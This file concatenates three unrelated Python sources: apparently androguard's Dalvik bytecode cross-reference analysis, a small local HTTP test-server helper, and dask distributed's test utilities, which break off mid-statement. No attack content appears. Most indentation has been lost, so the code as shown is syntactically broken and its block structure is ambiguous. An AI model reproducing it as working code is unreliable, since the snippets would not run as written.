def get_orig_value(self):
return self.orig_value
def __str__(self):
data = "XREFto for string %s in\n" % repr(self.get_value())
for ref_class, ref_method in self.xreffrom:
data += "%s:%s\n" % (ref_class.get_vm_class().get_name(), ref_method
)
return data
class MethodClassAnalysis(object):
def __init__(self, method):
self.method = method
self.xrefto = set()
self.xreffrom = set()
def AddXrefTo(self, classobj, methodobj, offset):
# debug("Added method xrefto for %s [%s] to %s" % (self.method, classobj, methodobj))
self.xrefto.add((classobj, methodobj, offset))
def AddXrefFrom(self, classobj, methodobj, offset):
# debug("Added method xreffrom for %s [%s] to %s" % (self.method, classobj, methodobj))
self.xreffrom.add((classobj, methodobj, offset))
def get_xref_from(self):
return self.xreffrom
def get_xref_to(self):
return self.xrefto
def __str__(self):
data = "XREFto for %s\n" % self.method
for ref_class, ref_method, offset in self.xrefto:
data += "in\n"
data += "%s:%s @0x%x\n" % (ref_class.get_vm_class().get_name(), ref_method, offset
)
data += "XREFFrom for %s\n" % self.method
for ref_class, ref_method, offset in self.xreffrom:
data += "in\n"
data += "%s:%s @0x%x\n" % (ref_class.get_vm_class().get_name(), ref_method, offset
)
return data
class FieldClassAnalysis(object):
def __init__(self, field):
self.field = field
self.xrefread = set()
self.xrefwrite = set()
def AddXrefRead(self, classobj, methodobj):
# debug("Added method xrefto for %s [%s] to %s" % (self.method, classobj, methodobj))
self.xrefread.add((classobj, methodobj))
def AddXrefWrite(self, classobj, methodobj):
# debug("Added method xreffrom for %s [%s] to %s" % (self.method, classobj, methodobj))
self.xrefwrite.add((classobj, methodobj))
def get_xref_read(self):
return self.xrefread
def get_xref_write(self):
return self.xrefwrite
def __str__(self):
data = "XREFRead for %s\n" % self.field
for ref_class, ref_method in self.xrefread:
data += "in\n"
data += "%s:%s\n" % (ref_class.get_vm_class().get_name(), ref_method
)
data += "XREFWrite for %s\n" % self.field
for ref_class, ref_method in self.xrefwrite:
data += "in\n"
data += "%s:%s\n" % (ref_class.get_vm_class().get_name(), ref_method
)
return data
REF_NEW_INSTANCE = 0
REF_CLASS_USAGE = 1
class ExternalClass(object):
def __init__(self, name):
self.name = name
self.methods = {}
def get_methods(self):
return self.methods.values()
def GetMethod(self, name, descriptor):
key = name + str(descriptor)
if key not in self.methods:
self.methods[key] = ExternalMethod(self.name, name, descriptor)
return self.methods[key]
class ExternalMethod(object):
def __init__(self, class_name, name, descriptor):
self.class_name = class_name
self.name = name
self.descriptor = descriptor
def get_name(self):
return self.name
def get_class_name(self):
return self.class_name
def get_descriptor(self):
return ''.join(self.descriptor)
def __str__(self):
return "%s->%s%s" % (self.class_name, self.name, ''.join(self.descriptor))
class ClassAnalysis(object):
def __init__(self, classobj, internal=False):
self.orig_class = classobj
self._inherits_methods = {}
self._methods = {}
self._fields = {}
self.internal = internal
self.xrefto = collections.defaultdict(set)
self.xreffrom = collections.defaultdict(set)
def get_methods(self):
return list(self._methods.values())
def get_nb_methods(self):
return len(self._methods)
def get_method_analysis(self, method):
return self._methods.get(method)
def get_field_analysis(self, field):
return self._fields.get(field)
def GetFakeMethod(self, name, descriptor):
if not self.internal:
return self.orig_class.GetMethod(name, descriptor)
        # We are searching for an unknown method in this class.
        # It could be something that the class inherits.
key = name + str(descriptor)
if key not in self._inherits_methods:
self._inherits_methods[key] = ExternalMethod(self.orig_class.get_name(), name, descriptor)
return self._inherits_methods[key]
def AddFXrefRead(self, method, classobj, field):
if field not in self._fields:
self._fields[field] = FieldClassAnalysis(field)
self._fields[field].AddXrefRead(classobj, method)
def AddFXrefWrite(self, method, classobj, field):
if field not in self._fields:
self._fields[field] = FieldClassAnalysis(field)
self._fields[field].AddXrefWrite(classobj, method)
def AddMXrefTo(self, method1, classobj, method2, offset):
if method1 not in self._methods:
self._methods[method1] = MethodClassAnalysis(method1)
self._methods[method1].AddXrefTo(classobj, method2, offset)
def AddMXrefFrom(self, method1, classobj, method2, offset):
if method1 not in self._methods:
self._methods[method1] = MethodClassAnalysis(method1)
self._methods[method1].AddXrefFrom(classobj, method2, offset)
def AddXrefTo(self, ref_kind, classobj, methodobj, offset):
self.xrefto[classobj].add((ref_kind, methodobj, offset))
def AddXrefFrom(self, ref_kind, classobj, methodobj, offset):
self.xreffrom[classobj].add((ref_kind, methodobj, offset))
def get_xref_from(self):
return self.xreffrom
def get_xref_to(self):
return self.xrefto
def get_vm_class(self):
return self.orig_class
def __str__(self):
        # Print only instantiations from other classes here
# TODO also method xref and field xref should be printed?
data = "XREFto for %s\n" % self.orig_class
for ref_class in self.xrefto:
data += str(ref_class.get_vm_class().get_name()) + " "
data += "in\n"
for ref_kind, ref_method, ref_offset in self.xrefto[ref_class]:
data += "%d %s 0x%x\n" % (ref_kind, ref_method, ref_offset)
data += "\n"
data += "XREFFrom for %s\n" % self.orig_class
for ref_class in self.xreffrom:
data += str(ref_class.get_vm_class().get_name()) + " "
data += "in\n"
for ref_kind, ref_method, ref_offset in self.xreffrom[ref_class]:
data += "%d %s 0x%x\n" % (ref_kind, ref_method, ref_offset)
data += "\n"
return data
class Analysis(object):
def __init__(self, vm):
self.vms = [vm]
self.classes = {}
self.strings = {}
self.methods = {}
for current_class in vm.get_classes():
self.classes[current_class.get_name()] = ClassAnalysis(
current_class, True)
for method in vm.get_methods():
self.methods[method] = MethodAnalysis(vm, method)
def create_xref(self):
debug("Creating XREF/DREF")
started_at = time.time()
instances_class_name = list(self.classes.keys())
queue_classes = queue.Queue()
last_vm = self.vms[-1]
for current_class in last_vm.get_classes():
queue_classes.put(current_class)
threads = []
        # TODO maybe adjust this number to the
        # number of cores, or make it configurable?
for n in range(2):
thread = threading.Thread(target=self._create_xref, args=(instances_class_name, last_vm, queue_classes))
thread.daemon = True
thread.start()
threads.append(thread)
debug("Waiting all threads")
queue_classes.join()
debug("")
diff = time.time() - started_at
debug("End of creating XREF/DREF {:.0f}:{:.2f}".format(*divmod(diff, 60)))
def _create_xref(self, instances_class_name, last_vm, queue_classes):
while not queue_classes.empty():
current_class = queue_classes.get()
debug("Creating XREF/DREF for %s" % current_class.get_name())
for current_method in current_class.get_methods():
debug("Creating XREF for %s" % current_method)
code = current_method.get_code()
if code is None:
continue
off = 0
bc = code.get_bc()
try:
for instruction in bc.get_instructions():
op_value = instruction.get_op_value()
if op_value in [0x1c, 0x22]:
idx_type = instruction.get_ref_kind()
type_info = last_vm.get_cm_type(idx_type)
# Internal xref related to class manipulation
if type_info in instances_class_name and type_info != current_class.get_name(
):
# new instance
if op_value == 0x22:
self.classes[current_class.get_name(
)].AddXrefTo(REF_NEW_INSTANCE,
self.classes[type_info],
current_method, off)
self.classes[type_info].AddXrefFrom(
REF_NEW_INSTANCE,
self.classes[current_class.get_name()],
current_method, off)
# class reference
else:
self.classes[current_class.get_name(
)].AddXrefTo(REF_CLASS_USAGE,
self.classes[type_info],
current_method, off)
self.classes[type_info].AddXrefFrom(
REF_CLASS_USAGE,
self.classes[current_class.get_name()],
current_method, off)
elif ((0x6e <= op_value <= 0x72) or
(0x74 <= op_value <= 0x78)):
idx_meth = instruction.get_ref_kind()
method_info = last_vm.get_cm_method(idx_meth)
if method_info:
class_info = method_info[0]
method_item = last_vm.get_method_descriptor(
method_info[0], method_info[1],
''.join(method_info[2]))
# Seems to be an external classes
if not method_item:
if method_info[0] not in self.classes:
self.classes[method_info[0]] = ClassAnalysis(ExternalClass(method_info[0]),
False)
method_item = self.classes[method_info[0]].GetFakeMethod(method_info[1],
method_info[2])
if method_item:
self.classes[current_class.get_name(
)].AddMXrefTo(current_method,
self.classes[class_info],
method_item,
off)
self.classes[class_info].AddMXrefFrom(
method_item,
self.classes[current_class.get_name()],
current_method,
off)
# Internal xref related to class manipulation
if class_info in instances_class_name and class_info != current_class.get_name(
):
self.classes[current_class.get_name(
)].AddXrefTo(REF_CLASS_USAGE,
self.classes[class_info],
method_item, off)
self.classes[class_info].AddXrefFrom(
REF_CLASS_USAGE,
self.classes[current_class.get_name()],
current_method, off)
elif 0x1a <= op_value <= 0x1b:
string_value = last_vm.get_cm_string(
instruction.get_ref_kind())
if string_value not in self.strings:
self.strings[string_value] = StringAnalysis(
string_value)
self.strings[string_value].AddXrefFrom(
self.classes[current_class.get_name()],
current_method)
elif 0x52 <= op_value <= 0x6d:
idx_field = instruction.get_ref_kind()
field_info = last_vm.get_cm_field(idx_field)
field_item = last_vm.get_field_descriptor(
field_info[0], field_info[2], field_info[1])
if field_item:
# read access to a field
if (0x52 <= op_value <= 0x58) or (
0x60 <= op_value <= 0x66):
self.classes[current_class.get_name(
)].AddFXrefRead(
current_method,
self.classes[current_class.get_name()],
field_item)
# write access to a field
else:
self.classes[current_class.get_name(
)].AddFXrefWrite(
current_method,
self.classes[current_class.get_name()],
field_item)
off += instruction.get_length()
except dvm.InvalidInstruction as e:
warning("Invalid instruction %s" % str(e))
queue_classes.task_done()
def get_method(self, method):
"""
:param method:
:return: `MethodAnalysis` object for the given method
"""
if method in self.methods:
return self.methods[method]
else:
return None
def get_method_by_name(self, class_name, method_name, method_descriptor):
if class_name in self.classes:
for method in self.classes[class_name].get_vm_class().get_methods():
if method.get_name() == method_name and method.get_descriptor(
) == method_descriptor:
return method
return None
def get_method_analysis(self, method):
"""
:param method:
:return: `MethodClassAnalysis` for the given method
"""
class_analysis = self.get_class_analysis(method.get_class_name())
if class_analysis:
return class_analysis.get_method_analysis(method)
return None
def get_method_analysis_by_name(self, class_name, method_name, method_descriptor):
method = self.get_method_by_name(class_name, method_name, method_descriptor)
if method:
return self.get_method_analysis(method)
return None
def get_field_analysis(self, field):
class_analysis = self.get_class_analysis(field.get_class_name())
if class_analysis:
return class_analysis.get_field_analysis(field)
return None
def is_class_present(self, class_name):
return class_name in self.classes
def get_class_analysis(self, class_name):
return self.classes.get(class_name)
def get_external_classes(self):
for i in self.classes:
if not self.classes[i].internal:
yield self.classes[i]
def get_strings_analysis(self):
return self.strings
def add(self, vm):
self.vms.append(vm)
for current_class in vm.get_classes():
if current_class.get_name() not in self.classes:
self.classes[current_class.get_name()] = ClassAnalysis(
current_class, True)
def is_ascii_obfuscation(vm):
for classe in vm.get_classes():
if is_ascii_problem(classe.get_name()):
return True
for method in classe.get_methods():
if is_ascii_problem(method.get_name()):
return True
return False
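# Illustrative usage (assumes `d` is an androguard DalvikVMFormat instance; the class
# name below is hypothetical):
#
#     dx = Analysis(d)
#     dx.create_xref()
#     ca = dx.get_class_analysis("Lcom/example/Foo;")
#     print(ca)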
|
utils.py
|
import os
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler
from tempfile import mkdtemp
import requests
import requests_cache
from . import get_logger
lgr = get_logger()
class LoggingRequestHandler(SimpleHTTPRequestHandler):
def log_message(self, format, *args):
lgr.debug(format % args)
def simple_http_server(host="localhost", port=4001, path="."):
"""
From: https://stackoverflow.com/a/38943044
"""
server = HTTPServer((host, port), LoggingRequestHandler)
thread = threading.Thread(target=server.serve_forever)
    thread.daemon = True
cwd = os.getcwd()
def start():
os.chdir(path)
thread.start()
lgr.debug("starting server on port {}".format(server.server_port))
def stop():
os.chdir(cwd)
server.shutdown()
server.socket.close()
lgr.debug("stopping server on port {}".format(server.server_port))
return start, stop, port
def start_server(port=8000, path=None, tmpdir=None):
if path is None:
path = os.getcwd()
requests_cache.install_cache(tmpdir or mkdtemp())
start, stop, port = simple_http_server(port=port, path=path)
start()
return stop, port
def stop_server(stop):
stop()
requests_cache.clear()
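# Minimal usage sketch (illustrative; path and port are arbitrary):
#
#     stop, port = start_server(port=8000, path="/tmp/www")
#     r = requests.get("http://localhost:{}/index.html".format(port))
#     stop_server(stop)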
|
utils_test.py
|
from __future__ import print_function, division, absolute_import
import collections
from contextlib import contextmanager
import copy
from datetime import timedelta
import functools
import gc
from glob import glob
import itertools
import logging
import logging.config
import os
import re
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import textwrap
import threading
from time import sleep
import uuid
import warnings
import weakref
try:
import ssl
except ImportError:
ssl = None
import pytest
import six
import dask
from toolz import merge, memoize, assoc
from tornado import gen, queues
from tornado.gen import TimeoutError
from tornado.ioloop import IOLoop
from .client import default_client, _global_clients, Client
from .compatibility import PY3, Empty, WINDOWS
from .comm import Comm
from .comm.utils import offload
from .config import initialize_logging
from .core import connect, rpc, CommClosedError
from .deploy import SpecCluster
from .metrics import time
from .process import _cleanup_dangling
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
ignoring,
log_errors,
mp_context,
get_ip,
get_ipv6,
DequeHandler,
reset_logger_locks,
sync,
iscoroutinefunction,
thread_state,
)
from .worker import Worker, TOTAL_MEMORY
from .nanny import Nanny
try:
import dask.array # register config
except ImportError:
pass
logger = logging.getLogger(__name__)
logging_levels = {
name: logger.level
for name, logger in logging.root.manager.loggerDict.items()
if isinstance(logger, logging.Logger)
}
offload(lambda: None).result() # create thread during import
@pytest.fixture(scope="session")
def valid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("print('hello world!')")
return local_file
@pytest.fixture(scope="session")
def client_contract_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("distributed_script.py")
lines = (
"from distributed import Client",
"e = Client('127.0.0.1:8989')",
"print(e)",
)
local_file.write("\n".join(lines))
return local_file
@pytest.fixture(scope="session")
def invalid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("a+1")
return local_file
@gen.coroutine
def cleanup_global_workers():
for worker in Worker._instances:
worker.close(report=False, executor_wait=False)
@pytest.fixture
def loop():
with check_instances():
with pristine_loop() as loop:
# Monkey-patch IOLoop.start to wait for loop stop
orig_start = loop.start
is_stopped = threading.Event()
is_stopped.set()
def start():
is_stopped.clear()
try:
orig_start()
finally:
is_stopped.set()
loop.start = start
yield loop
# Stop the loop in case it's still running
try:
sync(loop, cleanup_global_workers, callback_timeout=0.500)
loop.add_callback(loop.stop)
except RuntimeError as e:
if not re.match("IOLoop is clos(ed|ing)", str(e)):
raise
except gen.TimeoutError:
pass
else:
is_stopped.wait()
@pytest.fixture
def loop_in_thread():
with pristine_loop() as loop:
thread = threading.Thread(target=loop.start, name="test IOLoop")
thread.daemon = True
thread.start()
loop_started = threading.Event()
loop.add_callback(loop_started.set)
loop_started.wait()
yield loop
loop.add_callback(loop.stop)
thread.join(timeout=5)
@pytest.fixture
def zmq_ctx():
import zmq
ctx = zmq.Context.instance()
yield ctx
ctx.destroy(linger=0)
@contextmanager
def pristine_loop():
IOLoop.clear_instance()
IOLoop.clear_current()
loop = IOLoop()
loop.make_current()
assert IOLoop.current() is loop
try:
yield loop
finally:
try:
loop.close(all_fds=True)
except (KeyError, ValueError):
pass
IOLoop.clear_instance()
IOLoop.clear_current()
@contextmanager
def mock_ipython():
import mock
from distributed._ipython_utils import remote_magic
ip = mock.Mock()
ip.user_ns = {}
ip.kernel = None
def get_ip():
return ip
with mock.patch("IPython.get_ipython", get_ip), mock.patch(
"distributed._ipython_utils.get_ipython", get_ip
):
yield ip
# cleanup remote_magic client cache
for kc in remote_magic._clients.values():
kc.stop_channels()
remote_magic._clients.clear()
original_config = copy.deepcopy(dask.config.config)
def reset_config():
dask.config.config.clear()
dask.config.config.update(copy.deepcopy(original_config))
def nodebug(func):
"""
A decorator to disable debug facilities during timing-sensitive tests.
Warning: this doesn't affect already created IOLoops.
"""
if not PY3:
# py.test's runner magic breaks horridly on Python 2
# when a test function is wrapped, so avoid it
        # (incidentally, asyncio is irrelevant anyway)
return func
@functools.wraps(func)
def wrapped(*args, **kwargs):
old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
try:
return func(*args, **kwargs)
finally:
if old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = old_asyncio_debug
return wrapped
def nodebug_setup_module(module):
"""
A setup_module() that you can install in a test module to disable
debug facilities.
"""
module._old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if module._old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
def nodebug_teardown_module(module):
"""
A teardown_module() that you can install in a test module to reenable
debug facilities.
"""
if module._old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = module._old_asyncio_debug
def inc(x):
return x + 1
def dec(x):
return x - 1
def mul(x, y):
return x * y
def div(x, y):
return x / y
def deep(n):
if n > 0:
return deep(n - 1)
else:
return True
def throws(x):
raise RuntimeError("hello!")
def double(x):
return x * 2
def slowinc(x, delay=0.02):
sleep(delay)
return x + 1
def slowdec(x, delay=0.02):
sleep(delay)
return x - 1
def slowdouble(x, delay=0.02):
sleep(delay)
return 2 * x
def randominc(x, scale=1):
from random import random
sleep(random() * scale)
return x + 1
def slowadd(x, y, delay=0.02):
sleep(delay)
return x + y
def slowsum(seq, delay=0.02):
sleep(delay)
return sum(seq)
def slowidentity(*args, **kwargs):
delay = kwargs.get("delay", 0.02)
sleep(delay)
if len(args) == 1:
return args[0]
else:
return args
def run_for(duration, timer=time):
"""
Burn CPU for *duration* seconds.
"""
deadline = timer() + duration
while timer() <= deadline:
pass
# This dict grows at every varying() invocation
_varying_dict = collections.defaultdict(int)
_varying_key_gen = itertools.count()
class _ModuleSlot(object):
def __init__(self, modname, slotname):
self.modname = modname
self.slotname = slotname
def get(self):
return getattr(sys.modules[self.modname], self.slotname)
def varying(items):
"""
Return a function that returns a result (or raises an exception)
from *items* at each call.
"""
# cloudpickle would serialize the *values* of all globals
# used by *func* below, so we can't use `global <something>`.
# Instead look up the module by name to get the original namespace
# and not a copy.
slot = _ModuleSlot(__name__, "_varying_dict")
key = next(_varying_key_gen)
def func():
dct = slot.get()
i = dct[key]
if i == len(items):
raise IndexError
else:
x = items[i]
dct[key] = i + 1
if isinstance(x, Exception):
raise x
else:
return x
return func
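# Illustrative use of varying(): the returned callable walks through *items*, raising
# any exception instances it encounters and IndexError once the list is exhausted.
#
#     f = varying([1, ValueError("boom")])
#     f()   # -> 1
#     f()   # raises ValueError
#     f()   # raises IndexError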
def map_varying(itemslists):
"""
Like *varying*, but return the full specification for a map() call
on multiple items lists.
"""
def apply(func, *args, **kwargs):
return func(*args, **kwargs)
return apply, list(map(varying, itemslists))
@gen.coroutine
def geninc(x, delay=0.02):
yield gen.sleep(delay)
raise gen.Return(x + 1)
def compile_snippet(code, dedent=True):
if dedent:
code = textwrap.dedent(code)
code = compile(code, "<dynamic>", "exec")
ns = globals()
exec(code, ns, ns)
if sys.version_info >= (3, 5):
compile_snippet(
"""
async def asyncinc(x, delay=0.02):
await gen.sleep(delay)
return x + 1
"""
)
assert asyncinc # noqa: F821
else:
asyncinc = None
_readone_queues = {}
@gen.coroutine
def readone(comm):
"""
Read one message at a time from a comm that reads lists of
messages.
"""
try:
q = _readone_queues[comm]
except KeyError:
q = _readone_queues[comm] = queues.Queue()
@gen.coroutine
def background_read():
while True:
try:
messages = yield comm.read()
except CommClosedError:
break
for msg in messages:
q.put_nowait(msg)
q.put_nowait(None)
del _readone_queues[comm]
background_read()
msg = yield q.get()
if msg is None:
raise CommClosedError
else:
raise gen.Return(msg)
def run_scheduler(q, nputs, port=0, **kwargs):
from distributed import Scheduler
# On Python 2.7 and Unix, fork() is used to spawn child processes,
# so avoid inheriting the parent's IO loop.
with pristine_loop() as loop:
scheduler = Scheduler(validate=True, host="127.0.0.1", port=port, **kwargs)
done = scheduler.start()
for i in range(nputs):
q.put(scheduler.address)
try:
loop.start()
finally:
loop.close(all_fds=True)
def run_worker(q, scheduler_q, **kwargs):
from distributed import Worker
reset_logger_locks()
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
worker = Worker(scheduler_addr, validate=True, **kwargs)
loop.run_sync(lambda: worker._start())
q.put(worker.address)
try:
@gen.coroutine
def wait_until_closed():
yield worker._closed.wait()
loop.run_sync(wait_until_closed)
finally:
loop.close(all_fds=True)
def run_nanny(q, scheduler_q, **kwargs):
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
worker = Nanny(scheduler_addr, validate=True, **kwargs)
loop.run_sync(lambda: worker._start())
q.put(worker.address)
try:
loop.start()
finally:
loop.run_sync(worker.close)
loop.close(all_fds=True)
@contextmanager
def check_active_rpc(loop, active_rpc_timeout=1):
active_before = set(rpc.active)
if active_before and not PY3:
# On Python 2, try to avoid dangling comms before forking workers
gc.collect()
active_before = set(rpc.active)
yield
    # Some streams can take a bit of time to notice their peer
    # has closed, and keep a coroutine (*) waiting for a CommClosedError
    # before calling close_rpc().
    # This would happen especially if a non-localhost address is used,
    # as Nanny does.
    # (*) (example: gather_from_workers())
def fail():
pytest.fail(
"some RPCs left active by test: %s" % (set(rpc.active) - active_before)
)
@gen.coroutine
def wait():
yield async_wait_for(
lambda: len(set(rpc.active) - active_before) == 0,
timeout=active_rpc_timeout,
fail_func=fail,
)
loop.run_sync(wait)
@pytest.fixture
def cluster_fixture(loop):
with cluster() as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def s(cluster_fixture):
scheduler, workers = cluster_fixture
return scheduler
@pytest.fixture
def a(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[0]
@pytest.fixture
def b(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[1]
@pytest.fixture
def client(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@pytest.fixture
def client_secondary(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@contextmanager
def tls_cluster_context(
worker_kwargs=None, scheduler_kwargs=None, security=None, **kwargs
):
security = security or tls_only_security()
worker_kwargs = assoc(worker_kwargs or {}, "security", security)
scheduler_kwargs = assoc(scheduler_kwargs or {}, "security", security)
with cluster(
worker_kwargs=worker_kwargs, scheduler_kwargs=scheduler_kwargs, **kwargs
) as (s, workers):
yield s, workers
@pytest.fixture
def tls_cluster(loop, security):
with tls_cluster_context(security=security) as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def tls_client(tls_cluster, loop, security):
s, workers = tls_cluster
with Client(s["address"], security=security, loop=loop) as client:
yield client
@pytest.fixture
def security():
return tls_only_security()
@contextmanager
def cluster(
nworkers=2, nanny=False, worker_kwargs={}, active_rpc_timeout=1, scheduler_kwargs={}
):
ws = weakref.WeakSet()
enable_proctitle_on_children()
with clean(timeout=active_rpc_timeout, threads=False) as loop:
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
# The scheduler queue will receive the scheduler's address
scheduler_q = mp_context.Queue()
# Launch scheduler
scheduler = mp_context.Process(
name="Dask cluster test: Scheduler",
target=run_scheduler,
args=(scheduler_q, nworkers + 1),
kwargs=scheduler_kwargs,
)
ws.add(scheduler)
scheduler.daemon = True
scheduler.start()
# Launch workers
workers = []
for i in range(nworkers):
q = mp_context.Queue()
fn = "_test_worker-%s" % uuid.uuid4()
kwargs = merge(
{"nthreads": 1, "local_dir": fn, "memory_limit": TOTAL_MEMORY},
worker_kwargs,
)
proc = mp_context.Process(
name="Dask cluster test: Worker",
target=_run_worker,
args=(q, scheduler_q),
kwargs=kwargs,
)
ws.add(proc)
workers.append({"proc": proc, "queue": q, "dir": fn})
for worker in workers:
worker["proc"].start()
try:
for worker in workers:
worker["address"] = worker["queue"].get(timeout=5)
except Empty:
raise pytest.xfail.Exception("Worker failed to start in test")
saddr = scheduler_q.get()
start = time()
try:
try:
security = scheduler_kwargs["security"]
rpc_kwargs = {"connection_args": security.get_connection_args("client")}
except KeyError:
rpc_kwargs = {}
with rpc(saddr, **rpc_kwargs) as s:
while True:
nthreads = loop.run_sync(s.ncores)
if len(nthreads) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
# avoid sending processes down to function
yield {"address": saddr}, [
{"address": w["address"], "proc": weakref.ref(w["proc"])}
for w in workers
]
finally:
logger.debug("Closing out test cluster")
loop.run_sync(
lambda: disconnect_all(
[w["address"] for w in workers], timeout=0.5, rpc_kwargs=rpc_kwargs
)
)
loop.run_sync(lambda: disconnect(saddr, timeout=0.5, rpc_kwargs=rpc_kwargs))
scheduler.terminate()
scheduler_q.close()
scheduler_q._reader.close()
scheduler_q._writer.close()
for w in workers:
w["proc"].terminate()
w["queue"].close()
w["queue"]._reader.close()
w["queue"]._writer.close()
scheduler.join(2)
del scheduler
for proc in [w["proc"] for w in workers]:
proc.join(timeout=2)
with ignoring(UnboundLocalError):
del worker, w, proc
del workers[:]
for fn in glob("_test_worker-*"):
with ignoring(OSError):
shutil.rmtree(fn)
try:
client = default_client()
except ValueError:
pass
else:
client.close()
start = time()
while any(proc.is_alive() for proc in ws):
text = str(list(ws))
sleep(0.2)
assert time() < start + 5, ("Workers still around after five seconds", text)
@gen.coroutine
def disconnect(addr, timeout=3, rpc_kwargs=None):
rpc_kwargs = rpc_kwargs or {}
@gen.coroutine
def do_disconnect():
with ignoring(EnvironmentError, CommClosedError):
with rpc(addr, **rpc_kwargs) as w:
yield w.terminate(close=True)
with ignoring(TimeoutError):
yield gen.with_timeout(timedelta(seconds=timeout), do_disconnect())
@gen.coroutine
def disconnect_all(addresses, timeout=3, rpc_kwargs=None):
yield [disconnect(addr, timeout, rpc_kwargs) for addr in addresses]
def gen_test(timeout=10):
""" Coroutine test
@gen_test(timeout=5)
def test_foo():
yield ... # use tornado coroutines
"""
def _(func):
def test_func():
with clean() as loop:
if iscoroutinefunction(func):
cor = func
else:
cor = gen.coroutine(func)
loop.run_sync(cor, timeout=timeout)
return test_func
return _
from .scheduler import Scheduler
from .worker import Worker
@gen.coroutine
def start_cluster(
nthreads,
scheduler_addr,
loop,
security=None,
Worker=Worker,
scheduler_kwargs={},
worker_kwargs={},
):
s = Scheduler(
loop=loop, validate=True, security=security, port=0, **scheduler_kwargs
)
done = s.start(scheduler_addr)
workers = [
Worker(
s.address,
nthreads=ncore[1],
name=i,
security=security,
loop=loop,
validate=True,
host=ncore[0],
**(merge(worker_kwargs, ncore[2]) if len(ncore) > 2 else worker_kwargs)
)
for i, ncore in enumerate(nthreads)
]
# for w in workers:
# w.rpc = workers[0].rpc
yield workers
start = time()
while len(s.workers) < len(nthreads) or any(
comm.comm is None for comm in s.stream_comms.values()
):
yield gen.sleep(0.01)
if time() - start > 5:
yield [w.close(timeout=1) for w in workers]
yield s.close(fast=True)
raise Exception("Cluster creation timeout")
raise gen.Return((s, workers))
@gen.coroutine
def end_cluster(s, workers):
logger.debug("Closing out test cluster")
@gen.coroutine
def end_worker(w):
with ignoring(TimeoutError, CommClosedError, EnvironmentError):
yield w.close(report=False)
yield [end_worker(w) for w in workers]
yield s.close() # wait until scheduler stops completely
s.stop()
def gen_cluster(
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 2)],
ncores=None,
scheduler="127.0.0.1",
timeout=10,
security=None,
Worker=Worker,
client=False,
scheduler_kwargs={},
worker_kwargs={},
client_kwargs={},
active_rpc_timeout=1,
config={},
check_new_threads=True,
):
    """ Coroutine test with small cluster
    @gen_cluster()
    def test_foo(scheduler, worker1, worker2):
        yield ...  # use tornado coroutines
    See also:
        start
        end
    """
    from distributed import Client
if ncores is not None:
warnings.warn("ncores= has moved to nthreads=")
nthreads = ncores
worker_kwargs = merge(
{"memory_limit": TOTAL_MEMORY, "death_timeout": 5}, worker_kwargs
)
def _(func):
if not iscoroutinefunction(func):
func = gen.coroutine(func)
def test_func():
result = None
workers = []
with clean(threads=check_new_threads, timeout=active_rpc_timeout) as loop:
@gen.coroutine
def coro():
with dask.config.set(config):
s = False
for i in range(5):
try:
s, ws = yield start_cluster(
nthreads,
scheduler,
loop,
security=security,
Worker=Worker,
scheduler_kwargs=scheduler_kwargs,
worker_kwargs=worker_kwargs,
)
except Exception as e:
logger.error(
"Failed to start gen_cluster, retrying",
exc_info=True,
)
else:
workers[:] = ws
args = [s] + workers
break
if s is False:
raise Exception("Could not start cluster")
if client:
c = yield Client(
s.address,
loop=loop,
security=security,
asynchronous=True,
**client_kwargs
)
args = [c] + args
try:
future = func(*args)
if timeout:
future = gen.with_timeout(
timedelta(seconds=timeout), future
)
result = yield future
if s.validate:
s.validate_state()
finally:
if client and c.status not in ("closing", "closed"):
yield c._close(fast=s.status == "closed")
yield end_cluster(s, workers)
yield gen.with_timeout(
timedelta(seconds=1), cleanup_global_workers()
)
try:
c = yield default_client()
except ValueError:
pass
else:
yield c._close(fast=True)
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
yield gen.sleep(0.05)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
# raise ValueError("Unclosed Comms", L)
print("Unclosed Comms", L)
raise gen.Return(result)
result = loop.run_sync(
coro, timeout=timeout * 2 if timeout else timeout
)
for w in workers:
if getattr(w, "data", None):
try:
w.data.clear()
except EnvironmentError:
# zict backends can fail if their storage directory
# was already removed
pass
del w.data
return result
return test_func
return _
def raises(func, exc=Exception):
try:
func()
return False
except exc:
return True
def terminate_process(proc):
if proc.poll() is None:
if sys.platform.startswith("win"):
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGINT)
try:
if sys.version_info[0] == 3:
proc.wait(10)
else:
start = time()
while proc.poll() is None and time() < start + 10:
sleep(0.02)
finally:
# Make sure we don't leave the process lingering around
with ignoring(OSError):
proc.kill()
@contextmanager
def popen(args, **kwargs):
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.PIPE
if sys.platform.startswith("win"):
# Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT
kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
dump_stdout = False
args = list(args)
if sys.platform.startswith("win"):
args[0] = os.path.join(sys.prefix, "Scripts", args[0])
else:
args[0] = os.path.join(
